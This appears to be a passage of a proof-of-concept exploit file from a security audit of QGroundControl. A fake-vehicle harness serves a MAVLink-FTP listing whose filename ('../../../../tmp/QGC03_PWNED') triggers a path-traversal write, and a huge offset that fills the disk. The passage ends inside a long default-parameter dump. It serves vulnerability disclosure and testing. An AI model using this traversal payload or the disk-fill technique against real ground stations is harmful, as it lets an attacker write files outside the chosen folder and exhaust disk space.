#!/usr/bin/env python3
"""
poc_QGC03_ftp_listing_traversal_and_offset_fill.py
================================================================================
Finding ID : QGC-03
Target GCS : QGroundControl Daily Build  (commit 41bebb2 of the read-only audit clone)
Severity   : HIGH
Class      : CWE-22 (Path Traversal, local write) + CWE-770 (unbounded offset disk-fill)
Delivery   : handshake (MAVLink-FTP, request/response)

WHAT THIS DEMONSTRATES
----------------------
A MALICIOUS VEHICLE (or a full-MITM bridge on the telemetry link) acts as the
MAVLink-FTP *server*. QGroundControl is the FTP *client*. The ArduPilot "Lua
Scripting" setup page (APM plugin) lists `/APM/scripts/` over MAVFTP, shows the
returned filenames as download buttons, and -- crucially -- passes the
vehicle-supplied listing name *verbatim* as the explicit LOCAL filename when the
operator clicks "Download":

    src/AutoPilotPlugins/Common/ScriptingComponent.qml
      :25-40   filteredEntries -> strips ONLY the 1-char type byte and the "\t<size>"
               suffix from each ListDirectory entry. It does NOT strip '/' or '..'.
      :172     downloadDialog.fileToDownload = modelData         (the raw name)
      :273     ftpController.downloadFile(root.fullRemotePath(fileToDownload),
                                          folder, fileToDownload)  <-- 3rd arg = LOCAL name

    src/Vehicle/FTPController.cc:68      downloadFile(uri, localDir, fileName, ...)
    src/Vehicle/FTPManager.cc:30/75      explicit fileName branch stores it verbatim
                                          (bypasses the basename-strip at :64-73)
    src/Vehicle/FTPManager.cc:778        _downloadState.toDir.filePath(fileName)
                                          then open(WriteOnly|Truncate)
                                          -- QDir::filePath does NOT collapse '..'.

So a listing entry name of  ../../../../tmp/QGC03_PWNED  causes QGC to write the
downloaded bytes OUTSIDE the chosen save folder, to an attacker-chosen relative path.

SUB-ISSUE (disk-fill, CWE-770)
------------------------------
src/Vehicle/FTPManager.cc:855-856 (burst) and :1096-1097 (fill-missing) do
    _downloadState.file.seek(ackOrNak->hdr.offset);   // uint32, attacker-controlled
    _downloadState.file.write(ackOrNak->data, ackOrNak->hdr.size);
with NO bound check of hdr.offset against _downloadState.fileSize. A single burst
ACK with hdr.offset ~= 0xFFFFFF00 makes QGC seek ~4 GiB into the output file and
write there -> a ~4 GiB (sparse, or real on non-sparse FS) file from one tiny frame.

TWO MODES (choose with --mode)
------------------------------
  --mode traversal  (default): serve a ListDirectory whose single entry name is a
        BENIGN relative traversal, plus a small benign file body. When the operator
        downloads it, QGC writes the body to the traversed path.
  --mode diskfill : serve a normal-named script but, on BurstReadFile, answer with
        ONE ack carrying a huge hdr.offset so QGC seeks ~4 GiB and writes there.

SAFETY / AUTHORIZATION
----------------------
Authorized localhost/bench QGroundControl only. Every payload here is BENIGN:
  * traversal target is a SHORT RELATIVE path landing under /tmp (a marker file),
    not a system path, and the written content is a harmless text marker.
  * diskfill uses a large-but-bounded offset and writes a few benign bytes; on a
    sparse filesystem the on-disk cost is ~one block. Delete the file afterwards.
This PoC sends nothing destructive on its own; it only answers QGC's own requests.

USAGE
-----
  python poc_QGC03_ftp_listing_traversal_and_offset_fill.py --mode traversal
  # then in QGC: add TCP comm link to 127.0.0.1:5760, connect, open
  #   Vehicle Setup -> Lua Scripting, click the download button on the served entry,
  #   pick any save folder, confirm.
"""
import argparse
import os
import struct
import sys

os.environ["MAVLINK20"] = "1"   # force MAVLink 2 -- QGC Daily hard-rejects v1 traffic
                                 # ("MAVLink v1 traffic detected...only supports MAVLink v2")
                                 # and pymavlink defaults to v1 framing unless this is set
                                 # before pymavlink is imported (matches MP-01/G02).

# ============================================================================
# Embedded fake-vehicle harness — this PoC is SELF-CONTAINED (no external
# import, no separate harness file). Defines FakeVehicle, banner, observe,
# warn, ok, attack (+ wire helpers).
# ============================================================================
import argparse
import socket
import struct
import sys
import threading
import time

from pymavlink import mavutil
from pymavlink.mavutil import x25crc

# ---------------------------------------------------------------------------
# pretty output
# ---------------------------------------------------------------------------
_C = {"hdr": "\033[1;36m", "obs": "\033[0;37m", "warn": "\033[1;33m",
      "ok": "\033[1;32m", "atk": "\033[1;31m", "rst": "\033[0m"}


def banner(title):
    line = "=" * max(8, min(78, len(title) + 4))
    print("%s%s\n  %s\n%s%s" % (_C["hdr"], line, title, line, _C["rst"]))


def observe(msg): print("%s[obs]%s %s" % (_C["obs"], _C["rst"], msg))
def warn(msg):    print("%s[!]  %s%s"  % (_C["warn"], msg, _C["rst"]))
def ok(msg):      print("%s[ok] %s%s"  % (_C["ok"], msg, _C["rst"]))
def attack(msg):  print("%s[atk]%s %s" % (_C["atk"], _C["rst"], msg))


# ===========================================================================
# Raw MAVLink2 framing for messages that the locally-installed pymavlink dialect
# does NOT know (COMPONENT_INFORMATION id=395, COMPONENT_METADATA id=397).
# A malicious vehicle frames these by hand; a real GCS validates the CRC using
# the per-message CRC_EXTRA, so we compute CRC_EXTRA exactly the way the MAVLink
# generator (mavgen) does and verify it against a known message in the unit check
# at the bottom of this file.
# ===========================================================================
_TYPE_SIZE = {
    "uint8_t": 1, "int8_t": 1, "char": 1, "uint16_t": 2, "int16_t": 2,
    "uint32_t": 4, "int32_t": 4, "float": 4, "uint64_t": 8, "int64_t": 8,
    "double": 8, "uint8_t_mavlink_version": 1,
}


def _crc_extra(name, fields):
    """Replicate mavgen's CRC_EXTRA: x25 over 'NAME ' then, in WIRE order
    (stable sort by descending type size), 'TYPE ' 'FNAME ' and, for arrays,
    one length byte. Extension fields (after <extensions/>) are NOT included.

    fields: list of (type, name, array_len_or_0)  in XML declaration order,
            excluding any extension fields.
    """
    ordered = sorted(fields, key=lambda f: -_TYPE_SIZE[f[0]])  # stable -> ties keep order
    crc = x25crc()
    crc.accumulate_str(name + " ")
    for ftype, fname, alen in ordered:
        t = "uint8_t" if ftype == "uint8_t_mavlink_version" else ftype
        crc.accumulate_str(t + " ")
        crc.accumulate_str(fname + " ")
        if alen > 0:
            crc.accumulate(bytes([alen]))
    return (crc.crc & 0xFF) ^ (crc.crc >> 8)


def _wire_payload(fields, values):
    """Pack a payload in WIRE order (descending type size, stable), truncating
    trailing zero bytes the way MAVLink2 does. `values` is a dict name->python value."""
    ordered = sorted(range(len(fields)), key=lambda i: -_TYPE_SIZE[fields[i][0]])
    fmt = "<"
    packed = b""
    for i in ordered:
        ftype, fname, alen = fields[i]
        v = values[fname]
        if alen > 0 and ftype in ("char", "uint8_t", "int8_t"):
            if isinstance(v, str):
                v = v.encode("utf-8", "replace")
            v = (v + b"\x00" * alen)[:alen]
            packed += v
        elif alen > 0:
            raise NotImplementedError("non-byte arrays not needed here")
        else:
            packed += struct.pack({"uint32_t": "<I", "int32_t": "<i", "uint16_t": "<H",
                                   "int16_t": "<h", "uint8_t": "<B", "int8_t": "<b",
                                   "float": "<f"}[ftype], v)
    return packed


# Field definitions (declaration order, no extension fields) for the two messages
# the dialect lacks. Verified against c_library_v2 headers:
#   COMPONENT_METADATA(397)   CRC_EXTRA = 182
#   COMPONENT_INFORMATION(395) CRC_EXTRA = 0
_MSG_COMPONENT_METADATA = (
    397, "COMPONENT_METADATA",
    [("uint32_t", "time_boot_ms", 0),
     ("uint32_t", "file_crc", 0),
     ("char", "uri", 100)],
)
_MSG_COMPONENT_INFORMATION = (
    395, "COMPONENT_INFORMATION",
    [("uint32_t", "time_boot_ms", 0),
     ("uint32_t", "general_metadata_file_crc", 0),
     ("uint32_t", "peripherals_metadata_file_crc", 0),
     ("char", "general_metadata_uri", 100),
     ("char", "peripherals_metadata_uri", 100)],
)


# ===========================================================================
# FakeVehicle
# ===========================================================================
# Real ArduCopter 4.7.0 default parameter dump (name, default value), extracted
# verbatim from QGroundControl's own offline-editing reference at
# src/FirmwarePlugin/APM/Copter.OfflineEditing.params. Shipping the REAL default
# set (instead of a hand-picked subset) is what actually stops QGC's per-page
# "missing parameter" checks (FactPanelController::getParameterFact) for good --
# those checks fire the instant any setup page asks for a name we never sent,
# with no wire retry, so anticipating names one dialog at a time never converges.
_COPTER_DEFAULT_PARAMS_TSV = """
ACRO_BAL_PITCH 1
ACRO_BAL_ROLL 1
ACRO_OPTIONS 0
ACRO_RP_EXPO 0.30000001192092896
ACRO_RP_RATE 360
ACRO_RP_RATE_TC 0
ACRO_THR_MID 0
ACRO_TRAINER 2
ACRO_Y_EXPO 0
ACRO_Y_RATE 202.5
ACRO_Y_RATE_TC 0
ADSB_TYPE 0
AHRS_COMP_BETA 0.10000000149011612
AHRS_EKF_TYPE 3
AHRS_GPS_GAIN 1
AHRS_GPS_MINSATS 6
AHRS_GPS_USE 1
AHRS_OPTIONS 0
AHRS_ORIENTATION 0
AHRS_ORIGIN_ALT 0
AHRS_ORIGIN_LAT 0
AHRS_ORIGIN_LON 0
AHRS_RP_P 0.20000000298023224
AHRS_TRIM_X 0
AHRS_TRIM_Y 0
AHRS_TRIM_Z 0
AHRS_WIND_MAX 0
AHRS_YAW_P 0.20000000298023224
ARMING_ACCTHRESH 0.75
ARMING_MAGTHRESH 100
ARMING_MIS_ITEMS 0
ARMING_NEED_LOC 0
ARMING_OPTIONS 0
ARMING_RUDDER 2
ARMING_SKIPCHK 0
ARSPD_ENABLE 0
ATC_ACC_P_MAX 1100
ATC_ACC_R_MAX 1100
ATC_ACC_Y_MAX 270
ATC_ANGLE_BOOST 1
ATC_ANGLE_MAX 30
ATC_ANG_LIM_TC 1
ATC_ANG_PIT_P 4.5
ATC_ANG_RLL_P 4.5
ATC_ANG_YAW_P 4.5
ATC_INPUT_TC 0.15000000596046448
ATC_LAND_P_MULT 1
ATC_LAND_R_MULT 1
ATC_LAND_Y_MULT 1
ATC_RATE_FF_ENAB 1
ATC_RATE_P_MAX 0
ATC_RATE_R_MAX 0
ATC_RATE_WPY_MAX 60
ATC_RATE_Y_MAX 0
ATC_RAT_PIT_D 0.003599999938160181
ATC_RAT_PIT_D_FF 0
ATC_RAT_PIT_FF 0
ATC_RAT_PIT_FLTD 20
ATC_RAT_PIT_FLTE 0
ATC_RAT_PIT_FLTT 20
ATC_RAT_PIT_I 0.13500000536441803
ATC_RAT_PIT_IMAX 0.5
ATC_RAT_PIT_NEF 0
ATC_RAT_PIT_NTF 0
ATC_RAT_PIT_P 0.13500000536441803
ATC_RAT_PIT_PDMX 0
ATC_RAT_PIT_SMAX 0
ATC_RAT_RLL_D 0.003599999938160181
ATC_RAT_RLL_D_FF 0
ATC_RAT_RLL_FF 0
ATC_RAT_RLL_FLTD 20
ATC_RAT_RLL_FLTE 0
ATC_RAT_RLL_FLTT 20
ATC_RAT_RLL_I 0.13500000536441803
ATC_RAT_RLL_IMAX 0.5
ATC_RAT_RLL_NEF 0
ATC_RAT_RLL_NTF 0
ATC_RAT_RLL_P 0.13500000536441803
ATC_RAT_RLL_PDMX 0
ATC_RAT_RLL_SMAX 0
ATC_RAT_YAW_D 0
ATC_RAT_YAW_D_FF 0
ATC_RAT_YAW_FF 0
ATC_RAT_YAW_FLTD 20
ATC_RAT_YAW_FLTE 2.5
ATC_RAT_YAW_FLTT 20
ATC_RAT_YAW_I 0.019999999552965164
ATC_RAT_YAW_IMAX 0.5
ATC_RAT_YAW_NEF 0
ATC_RAT_YAW_NTF 0
ATC_RAT_YAW_P 0.30000001192092896
ATC_RAT_YAW_PDMX 0
ATC_RAT_YAW_SMAX 0
ATC_THR_G_BOOST 0
ATC_THR_MIX_MAN 0.10000000149011612
ATC_THR_MIX_MAX 0.5
ATC_THR_MIX_MIN 0.10000000149011612
AUTOTUNE_AGGR 0.07500000298023224
AUTOTUNE_AXES 7
AUTOTUNE_GMBK 0.25
AUTOTUNE_MIN_D 0.000500000023748726
AUTO_OPTIONS 0
AVD_ENABLE 0
AVOID_ACCEL_MAX 3
AVOID_ALT_MIN 0
AVOID_BACKUP_DZ 0.10000000149011612
AVOID_BACKUP_SPD 0.75
AVOID_BACKZ_SPD 0.75
AVOID_BEHAVE 0
AVOID_DIST_MAX 5
AVOID_ENABLE 3
AVOID_MARGIN 2
BARO1_DEVID 65540
BARO1_GND_PRESS 94502.828125
BARO1_WCF_ENABLE 0
BARO2_DEVID 65796
BARO2_GND_PRESS 94504.359375
BARO2_WCF_ENABLE 0
BARO3_DEVID 0
BARO3_GND_PRESS 0
BARO3_WCF_ENABLE 0
BARO_ALTERR_MAX 2000
BARO_ALT_OFFSET 0
BARO_EXT_BUS -1
BARO_FIELD_ELV 0
BARO_FLTR_RNG 0
BARO_GND_TEMP 0
BARO_OPTIONS 0
BARO_PRIMARY 0
BARO_PROBE_EXT 0
BATT2_AMP_OFFSET 0
BATT2_AMP_PERVLT 17
BATT2_ARM_MAH 0
BATT2_ARM_VOLT 0
BATT2_CAPACITY 3300
BATT2_CRT_MAH 0
BATT2_CRT_VOLT 0
BATT2_CURR_PIN 12
BATT2_FS_CRT_ACT 0
BATT2_FS_LOW_ACT 0
BATT2_FS_VOLTSRC 0
BATT2_LOW_MAH 0
BATT2_LOW_TIMER 10
BATT2_LOW_VOLT 10.5
BATT2_MONITOR 4
BATT2_OPTIONS 0
BATT2_SERIAL_NUM -1
BATT2_VLT_OFFSET 0
BATT2_VOLT_MULT 10.100000381469727
BATT2_VOLT_PIN 13
BATT3_MONITOR 0
BATT4_MONITOR 0
BATT5_MONITOR 0
BATT6_MONITOR 0
BATT7_MONITOR 0
BATT8_MONITOR 0
BATT9_MONITOR 0
BATT_AMP_OFFSET 0
BATT_AMP_PERVLT 17
BATT_ARM_MAH 0
BATT_ARM_VOLT 0
BATT_CAPACITY 3300
BATT_CRT_MAH 0
BATT_CRT_VOLT 0
BATT_CURR_PIN 12
BATT_FS_CRT_ACT 0
BATT_FS_LOW_ACT 0
BATT_FS_VOLTSRC 0
BATT_LOW_MAH 0
BATT_LOW_TIMER 10
BATT_LOW_VOLT 10.5
BATT_MONITOR 4
BATT_OPTIONS 0
BATT_SERIAL_NUM -1
BATT_VLT_OFFSET 0
BATT_VOLT_MULT 10.100000381469727
BATT_VOLT_PIN 13
BCN_TYPE 0
BRD_BOOT_DELAY 0
BRD_OPTIONS 0
BRD_RTC_TYPES 1
BRD_RTC_TZ_MIN 0
BRD_SAFETYOPTION 3
BRD_SAFETY_DEFLT 0
BRD_SAFETY_MASK 16368
BRD_SD_FENCE 0
BRD_SD_MISSION 0
BRD_SERIAL_NUM 0
BRD_VBUS_MIN 4.300000190734863
BRD_VSERVO_MIN 0
BTN_ENABLE 0
CAM1_TYPE 0
CAM2_TYPE 0
CAM_AUTO_ONLY 0
CAM_MAX_ROLL 0
CAN_D1_PROTOCOL 1
CAN_D1_PROTOCOL2 0
CAN_D2_PROTOCOL 1
CAN_D2_PROTOCOL2 0
CAN_LOGLEVEL 0
CAN_P1_DRIVER 0
CAN_P2_DRIVER 0
CC_TYPE 0
CHUTE_ENABLED 0
CIRCLE_OPTIONS 1
CIRCLE_RADIUS_M 10
CIRCLE_RATE 20
COMPASS_AUTODEC 1
COMPASS_AUTO_ROT 2
COMPASS_CAL_FIT 16
COMPASS_DEC 0
COMPASS_DEV_ID 97539
COMPASS_DEV_ID2 131874
COMPASS_DEV_ID3 263178
COMPASS_DEV_ID4 97283
COMPASS_DEV_ID5 97795
COMPASS_DEV_ID6 98051
COMPASS_DEV_ID7 0
COMPASS_DEV_ID8 0
COMPASS_DIA2_X 1
COMPASS_DIA2_Y 1
COMPASS_DIA2_Z 1
COMPASS_DIA3_X 1
COMPASS_DIA3_Y 1
COMPASS_DIA3_Z 1
COMPASS_DIA_X 1
COMPASS_DIA_Y 1
COMPASS_DIA_Z 1
COMPASS_DISBLMSK 0
COMPASS_ENABLE 1
COMPASS_EXTERN2 0
COMPASS_EXTERN3 0
COMPASS_EXTERNAL 1
COMPASS_FLTR_RNG 0
COMPASS_LEARN 0
COMPASS_MOT2_X 0
COMPASS_MOT2_Y 0
COMPASS_MOT2_Z 0
COMPASS_MOT3_X 0
COMPASS_MOT3_Y 0
COMPASS_MOT3_Z 0
COMPASS_MOTCT 0
COMPASS_MOT_X 0
COMPASS_MOT_Y 0
COMPASS_MOT_Z 0
COMPASS_ODI2_X 0
COMPASS_ODI2_Y 0
COMPASS_ODI2_Z 0
COMPASS_ODI3_X 0
COMPASS_ODI3_Y 0
COMPASS_ODI3_Z 0
COMPASS_ODI_X 0
COMPASS_ODI_Y 0
COMPASS_ODI_Z 0
COMPASS_OFFS_MAX 1800
COMPASS_OFS2_X 5
COMPASS_OFS2_Y 13
COMPASS_OFS2_Z -18
COMPASS_OFS3_X 5
COMPASS_OFS3_Y 13
COMPASS_OFS3_Z -18
COMPASS_OFS_X 5
COMPASS_OFS_Y 13
COMPASS_OFS_Z -18
COMPASS_OPTIONS 0
COMPASS_ORIENT 0
COMPASS_ORIENT2 0
COMPASS_ORIENT3 0
COMPASS_PMOT_EN 0
COMPASS_PRIO1_ID 97539
COMPASS_PRIO2_ID 131874
COMPASS_PRIO3_ID 263178
COMPASS_SCALE 1
COMPASS_SCALE2 1
COMPASS_SCALE3 1
COMPASS_USE 1
COMPASS_USE2 1
COMPASS_USE3 1
CUST_ROT_ENABLE 0
DEV_OPTIONS 0
DID_ENABLE 0
DISARM_DELAY 10
EAHRS_TYPE 0
EFI_TYPE 0
EK2_ENABLE 0
EK3_ABIAS_P_NSE 0.019999999552965164
EK3_ACC_BIAS_LIM 1
EK3_ACC_P_NSE 0.3499999940395355
EK3_AFFINITY 0
EK3_ALT_M_NSE 2
EK3_BCN_DELAY 50
EK3_BCN_I_GTE 500
EK3_BCN_M_NSE 1
EK3_BETA_MASK 0
EK3_CHECK_SCALE 100
EK3_DRAG_BCOEF_X 0
EK3_DRAG_BCOEF_Y 0
EK3_DRAG_MCOEF 0
EK3_DRAG_M_NSE 0.5
EK3_EAS_I_GATE 400
EK3_EAS_M_NSE 1.399999976158142
EK3_ENABLE 1
EK3_ERR_THRESH 0.20000000298023224
EK3_FLOW_DELAY 10
EK3_FLOW_I_GATE 300
EK3_FLOW_MAX 2.5
EK3_FLOW_M_NSE 0.25
EK3_FLOW_USE 1
EK3_GBIAS_P_NSE 0.001000000047497451
EK3_GLITCH_RAD 25
EK3_GND_EFF_DZ 4
EK3_GPS_CHECK 31
EK3_GPS_VACC_MAX 0
EK3_GSF_RST_MAX 2
EK3_GSF_RUN_MASK 3
EK3_GSF_USE_MASK 3
EK3_GYRO_P_NSE 0.014999999664723873
EK3_HGT_DELAY 60
EK3_HGT_I_GATE 500
EK3_HRT_FILT 2
EK3_IMU_MASK 3
EK3_LOG_LEVEL 0
EK3_MAGB_P_NSE 9.9999997473788e-05
EK3_MAGE_P_NSE 0.001000000047497451
EK3_MAG_CAL 3
EK3_MAG_EF_LIM 50
EK3_MAG_I_GATE 300
EK3_MAG_MASK 0
EK3_MAG_M_NSE 0.05000000074505806
EK3_NOAID_M_NSE 10
EK3_OGNM_TEST_SF 2
EK3_OGN_HGT_MASK 0
EK3_OPTIONS 0
EK3_POSNE_M_NSE 0.5
EK3_POS_I_GATE 500
EK3_PRIMARY 0
EK3_RNG_I_GATE 500
EK3_RNG_M_NSE 0.5
EK3_RNG_USE_HGT -1
EK3_RNG_USE_SPD 2
EK3_SRC1_POSXY 3
EK3_SRC1_POSZ 1
EK3_SRC1_VELXY 3
EK3_SRC1_VELZ 3
EK3_SRC1_YAW 1
EK3_SRC2_POSXY 0
EK3_SRC2_POSZ 1
EK3_SRC2_VELXY 0
EK3_SRC2_VELZ 0
EK3_SRC2_YAW 0
EK3_SRC3_POSXY 0
EK3_SRC3_POSZ 1
EK3_SRC3_VELXY 0
EK3_SRC3_VELZ 0
EK3_SRC3_YAW 0
EK3_SRC_OPTIONS 0
EK3_TAU_OUTPUT 25
EK3_TERR_GRAD 0.10000000149011612
EK3_VELD_M_NSE 0.5
EK3_VELNE_M_NSE 0.30000001192092896
EK3_VEL_I_GATE 500
EK3_VIS_VERR_MAX 0.8999999761581421
EK3_VIS_VERR_MIN 0.10000000149011612
EK3_WENC_VERR 0.10000000149011612
EK3_WIND_PSCALE 1
EK3_WIND_P_NSE 0.20000000298023224
EK3_YAW_I_GATE 300
EK3_YAW_M_NSE 0.5
ESC_CALIBRATION 0
ESC_TLM_MAV_OFS 0
FENCE_ACTION 1
FENCE_ALT_MAX 100
FENCE_ALT_MIN -10
FENCE_AUTOENABLE 0
FENCE_ENABLE 0
FENCE_MARGIN 2
FENCE_MARGIN_XY 0
FENCE_NTF_FREQ 1
FENCE_OPTIONS 0
FENCE_RADIUS 150
FENCE_TOTAL 0
FENCE_TYPE 7
FFT_ENABLE 0
FHLD_BRAKE_RATE 8
FHLD_FILT_HZ 5
FHLD_FLOW_MAX 0.6000000238418579
FHLD_QUAL_MIN 10
FHLD_XY_FILT_HZ 5
FHLD_XY_I 0.30000001192092896
FHLD_XY_IMAX 3000
FHLD_XY_P 0.20000000298023224
FILT1_TYPE 0
FILT2_TYPE 0
FILT3_TYPE 0
FILT4_TYPE 0
FILT5_TYPE 0
FILT6_TYPE 0
FILT7_TYPE 0
FILT8_TYPE 0
FLIGHT_OPTIONS 0
FLOW_TYPE 0
FLTMODE1 7
FLTMODE2 9
FLTMODE3 6
FLTMODE4 3
FLTMODE5 5
FLTMODE6 0
FLTMODE_CH 5
FLTMODE_GCSBLOCK 0
FOLL_ENABLE 0
FORMAT_VERSION 120
FRAME_CLASS 1
FRAME_TYPE 0
FRSKY_DNLINK1_ID 20
FRSKY_DNLINK2_ID 7
FRSKY_DNLINK_ID 27
FRSKY_OPTIONS 0
FRSKY_UPLINK_ID 13
FSTRATE_DIV 1
FSTRATE_ENABLE 0
FS_CRASH_CHECK 1
FS_DR_ENABLE 2
FS_DR_TIMEOUT 30
FS_EKF_ACTION 1
FS_EKF_FILT 5
FS_EKF_THRESH 0.800000011920929
FS_GCS_ENABLE 0
FS_GCS_TIMEOUT 5
FS_OPTIONS 16
FS_THR_ENABLE 1
FS_THR_VALUE 975
FS_VIBE_ENABLE 1
GCS_PID_MASK 0
GEN_TYPE 0
GND_EFFECT_COMP 1
GPS1_CAN_NODEID 0
GPS1_CAN_OVRIDE 0
GPS1_COM_PORT 1
GPS1_DELAY_MS 0
GPS1_GNSS_MODE 0
GPS1_MB_TYPE 0
GPS1_POS_X 0
GPS1_POS_Y 0
GPS1_POS_Z 0
GPS1_RATE_MS 200
GPS1_TYPE 1
GPS2_TYPE 0
GPS_AUTO_CONFIG 1
GPS_AUTO_SWITCH 1
GPS_BLEND_MASK 5
GPS_DRV_OPTIONS 0
GPS_HDOP_GOOD 140
GPS_INJECT_TO 127
GPS_MIN_ELEV -100
GPS_NAVFILTER 8
GPS_PRIMARY 0
GPS_RAW_DATA 0
GPS_SAVE_CFG 2
GPS_SBAS_MODE 2
GPS_SBP_LOGMASK -256
GRIP_ENABLE 0
GUID_OPTIONS 0
GUID_TIMEOUT 3
INITIAL_MODE 0
INS_ACC1_CALTEMP -300
INS_ACC2OFFS_X 0.001000000047497451
INS_ACC2OFFS_Y 0.001000000047497451
INS_ACC2OFFS_Z 0.001000000047497451
INS_ACC2SCAL_X 1.0010000467300415
INS_ACC2SCAL_Y 1.0010000467300415
INS_ACC2SCAL_Z 1.0010000467300415
INS_ACC2_CALTEMP -300
INS_ACC2_ID 0
INS_ACC3OFFS_X 0
INS_ACC3OFFS_Y 0
INS_ACC3OFFS_Z 0
INS_ACC3SCAL_X 1
INS_ACC3SCAL_Y 1
INS_ACC3SCAL_Z 1
INS_ACC3_CALTEMP -300
INS_ACC3_ID 0
INS_ACCEL_FILTER 20
INS_ACCOFFS_X 0.001000000047497451
INS_ACCOFFS_Y 0.001000000047497451
INS_ACCOFFS_Z 0.001000000047497451
INS_ACCSCAL_X 1.0010000467300415
INS_ACCSCAL_Y 1.0010000467300415
INS_ACCSCAL_Z 1.0010000467300415
INS_ACC_BODYFIX 2
INS_ACC_ID 0
INS_ENABLE_MASK 127
INS_FAST_SAMPLE 1
INS_GYR1_CALTEMP -300
INS_GYR2OFFS_X 0
INS_GYR2OFFS_Y 0
INS_GYR2OFFS_Z 0
INS_GYR2_CALTEMP -300
INS_GYR2_ID 0
INS_GYR3OFFS_X 0
INS_GYR3OFFS_Y 0
INS_GYR3OFFS_Z 0
INS_GYR3_CALTEMP -300
INS_GYR3_ID 0
INS_GYROFFS_X 0
INS_GYROFFS_Y 0
INS_GYROFFS_Z 0
INS_GYRO_FILTER 20
INS_GYRO_RATE 0
INS_GYR_CAL 1
INS_GYR_ID 0
INS_HNTC2_ENABLE 0
INS_HNTC3_ENABLE 0
INS_HNTCH_ENABLE 0
INS_LOG_BAT_CNT 1024
INS_LOG_BAT_LGCT 32
INS_LOG_BAT_LGIN 20
INS_LOG_BAT_MASK 0
INS_LOG_BAT_OPT 0
INS_POS1_X 0
INS_POS1_Y 0
INS_POS1_Z 0
INS_POS2_X 0
INS_POS2_Y 0
INS_POS2_Z 0
INS_POS3_X 0
INS_POS3_Y 0
INS_POS3_Z 0
INS_RAW_LOG_OPT 0
INS_STILL_THRESH 2.5
INS_TCAL1_ENABLE 0
INS_TCAL2_ENABLE 0
INS_TCAL3_ENABLE 0
INS_TCAL_OPTIONS 0
INS_TRIM_OPTION 1
INS_USE 1
INS_USE2 1
INS_USE3 1
KDE_NPOLE 14
LAND_ALT_LOW_M 10
LAND_REPOSITION 1
LAND_SPD_HIGH_MS 0
LAND_SPD_MS 0.5
LGR_ENABLE 0
LOG_BACKEND_TYPE 1
LOG_BITMASK 180222
LOG_BLK_RATEMAX 0
LOG_DARM_RATEMAX 0
LOG_DISARMED 0
LOG_FILE_BUFSIZE 200
LOG_FILE_DSRMROT 0
LOG_FILE_MB_FREE 500
LOG_FILE_RATEMAX 0
LOG_FILE_TIMEOUT 5
LOG_MAV_BUFSIZE 8
LOG_MAV_RATEMAX 0
LOG_MAX_FILES 500
LOG_REPLAY 0
LOIT_ACC_MAX_M 5
LOIT_ANG_MAX 0
LOIT_BRK_ACC_M 2.5
LOIT_BRK_DELAY 1
LOIT_BRK_JRK_M 5
LOIT_OPTIONS 1
LOIT_SPEED_MS 12.5
MAV1_ADSB 0
MAV1_EXTRA1 0
MAV1_EXTRA2 0
MAV1_EXTRA3 0
MAV1_EXT_STAT 0
MAV1_OPTIONS 0
MAV1_PARAMS 0
MAV1_POSITION 0
MAV1_RAW_CTRL 0
MAV1_RAW_SENS 0
MAV1_RC_CHAN 0
MAV2_ADSB 0
MAV2_EXTRA1 0
MAV2_EXTRA2 0
MAV2_EXTRA3 0
MAV2_EXT_STAT 0
MAV2_OPTIONS 0
MAV2_PARAMS 0
MAV2_POSITION 0
MAV2_RAW_CTRL 0
MAV2_RAW_SENS 0
MAV2_RC_CHAN 0
MAV3_ADSB 0
MAV3_EXTRA1 0
MAV3_EXTRA2 0
MAV3_EXTRA3 0
MAV3_EXT_STAT 0
MAV3_OPTIONS 0
MAV3_PARAMS 0
MAV3_POSITION 0
MAV3_RAW_CTRL 0
MAV3_RAW_SENS 0
MAV3_RC_CHAN 0
MAV_GCS_SYSID 255
MAV_GCS_SYSID_HI 0
MAV_OPTIONS 0
MAV_SYSID 1
MAV_TELEM_DELAY 0
MIS_OPTIONS 0
MIS_RESTART 0
MIS_TOTAL 0
MNT1_TYPE 0
MNT2_TYPE 0
MOT_BAT_CURR_MAX 0
MOT_BAT_CURR_TC 5
MOT_BAT_IDX 0
MOT_BAT_VOLT_MAX 12.800000190734863
MOT_BAT_VOLT_MIN 9.600000381469727
MOT_BOOST_SCALE 0
MOT_HOVER_LEARN 2
MOT_IDLE_SEC 0
MOT_OPTIONS 0
MOT_PWM_MAX 2000
MOT_PWM_MIN 1000
MOT_PWM_TYPE 0
MOT_SAFE_DISARM 0
MOT_SAFE_TIME 1
MOT_SLEW_DN_TIME 0
MOT_SLEW_UP_TIME 0
MOT_SPIN_ARM 0.10000000149011612
MOT_SPIN_MAX 0.949999988079071
MOT_SPIN_MIN 0.15000000596046448
MOT_SPOOL_TIME 0.5
MOT_SPOOL_TIM_DN 0
MOT_THST_EXPO 0.6499999761581421
MOT_THST_HOVER 0.38999998569488525
MOT_YAW_HEADROOM 200
MSP_OPTIONS 0
MSP_OSD_NCELLS 0
NET_ENABLE 0
NET_P1_TYPE 0
NET_P2_TYPE 0
NET_P3_TYPE 0
NET_P4_TYPE 0
NMEA_MSG_EN 3
NMEA_RATE_MS 100
NTF_BUZZ_ON_LVL 1
NTF_BUZZ_PIN -1
NTF_BUZZ_TYPES 5
NTF_BUZZ_VOLUME 100
NTF_DISPLAY_TYPE 0
NTF_LED_BRIGHT 3
NTF_LED_LEN 1
NTF_LED_OVERRIDE 0
NTF_LED_TYPES 123079
OA_TYPE 0
OSD_TYPE 0
PHLD_BRK_ANGLE 30
PHLD_BRK_RATE 8
PILOT_ACC_Z 2.5
PILOT_SPD_DN 0
PILOT_SPD_UP 2.5
PILOT_THR_BHV 0
PILOT_THR_FILT 0
PILOT_TKO_ALT_M 0
PILOT_Y_EXPO 0
PILOT_Y_RATE 202.5
PILOT_Y_RATE_TC 0
PLDP_DELAY 0
PLDP_RNG_MAX 0
PLDP_SPEED_DN 0
PLDP_THRESH 0.8999999761581421
PLND_ENABLED 0
PRX1_TYPE 0
PRX2_TYPE 0
PRX3_TYPE 0
PRX4_TYPE 0
PRX5_TYPE 0
PRX_ALT_MIN 1
PRX_FILT 0.25
PRX_IGN_GND 0
PRX_LOG_RAW 0
PSC_ANGLE_MAX 0
PSC_D_ACC_D 0
PSC_D_ACC_D_FF 0
PSC_D_ACC_FF 0
PSC_D_ACC_FLTD 0
PSC_D_ACC_FLTE 20
PSC_D_ACC_FLTT 0
PSC_D_ACC_I 0.10000000149011612
PSC_D_ACC_IMAX 0.800000011920929
PSC_D_ACC_NEF 0
PSC_D_ACC_NTF 0
PSC_D_ACC_P 0.05000000074505806
PSC_D_ACC_PDMX 0
PSC_D_ACC_SMAX 0
PSC_D_POS_P 1
PSC_D_VEL_D 0
PSC_D_VEL_FF 0
